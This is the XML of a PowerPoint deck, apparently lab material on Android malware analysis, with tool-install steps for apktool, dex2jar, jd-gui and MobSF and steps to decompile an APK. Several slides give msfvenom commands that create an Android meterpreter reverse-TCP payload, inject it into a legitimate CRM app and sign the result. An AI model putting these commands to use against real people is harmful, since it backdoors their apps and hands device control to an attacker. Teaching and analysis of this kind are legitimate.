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9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5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9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6767-1CBC-4DCD-8DE1-DD96854C4B4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217A-0103-4C61-8330-92D3EB68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0" b="56842"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="713386" y="148247"/>
            <a:ext cx="10488014" cy="63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0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3" y="283391"/>
            <a:ext cx="11136029" cy="62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0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4" y="276727"/>
            <a:ext cx="11310485" cy="63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4" y="228600"/>
            <a:ext cx="11395849" cy="64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9" y="312821"/>
            <a:ext cx="11066237" cy="61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0" y="196674"/>
            <a:ext cx="11409794" cy="64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264693"/>
            <a:ext cx="11244012" cy="63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328" y="421104"/>
            <a:ext cx="113096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install the required tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>apktool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jd-gui</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>apt-get install dex2jar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To create an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> payload rom scratch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –p android/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> LHOST=192.168.1.114 LPORT=4444 R &gt; /home/kali/Desktop/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>trojan.apk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sign an APK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>d2j-apk-sign </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>trojan.apk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install zip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>archiver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p7zip-full p7zip-rar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>7z e files.7z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To decode an APK file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>apktool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> d 5ec214704b63d93181932d389f4ed76bd730bd05e912518a1357a413d6fa96b1.apk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cd 5ec214704b63d93181932d389f4ed76bd730bd05e912518a1357a413d6fa96b1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To decompile an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>classes.dex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d2j-dex2jar 5ec214704b63d93181932d389f4ed76bd730bd05e912518a1357a413d6fa96b1.apk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265277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169" y="324851"/>
            <a:ext cx="113457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inject an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> with a payload </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CRM.apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> --arch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dalvik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> --platform android –p android/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> LHOST=192.168.1.114 LPORT=4444 -e generic/none -f raw -o &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CRM_infected.apk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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CRM.apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -p android/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> LHOST=192.168.1.76 LPORT=4444 -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CRM_backdoored.apk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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To install and run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MobSF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>apt-get install python3-pip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>apt-get install python3-venv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https://github.com/MobSF/Mobile-Security-Framework-MobSF.git</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cd Mobile-Security-Framework-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MobSF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>./setup.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>./run.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open http://localhost:8000/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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tools </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kali@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:~$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> apt install -y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err="1" smtClean="0"/>
              <a:t>virtualbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-pack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genymotion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and run it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>genymotion.com</a:t>
            </a:r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If you are using Android Studio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>echo$PATH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>export PATH="$HOME/kali/Downloads/android-studio/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/bin:$PATH"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7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8" y="457784"/>
            <a:ext cx="10599821" cy="59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9" y="328950"/>
            <a:ext cx="10929727" cy="62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8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6" y="548904"/>
            <a:ext cx="10533307" cy="59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44" y="440621"/>
            <a:ext cx="10468998" cy="58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1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7" y="442716"/>
            <a:ext cx="10837898" cy="60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7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86538"/>
            <a:ext cx="11292072" cy="63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7" y="168442"/>
            <a:ext cx="11345142" cy="63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4" y="319321"/>
            <a:ext cx="10884108" cy="61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4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172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2022-05-26T12:14:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-28T08:25:41Z</dcterms:modified>
</cp:coreProperties>
</file>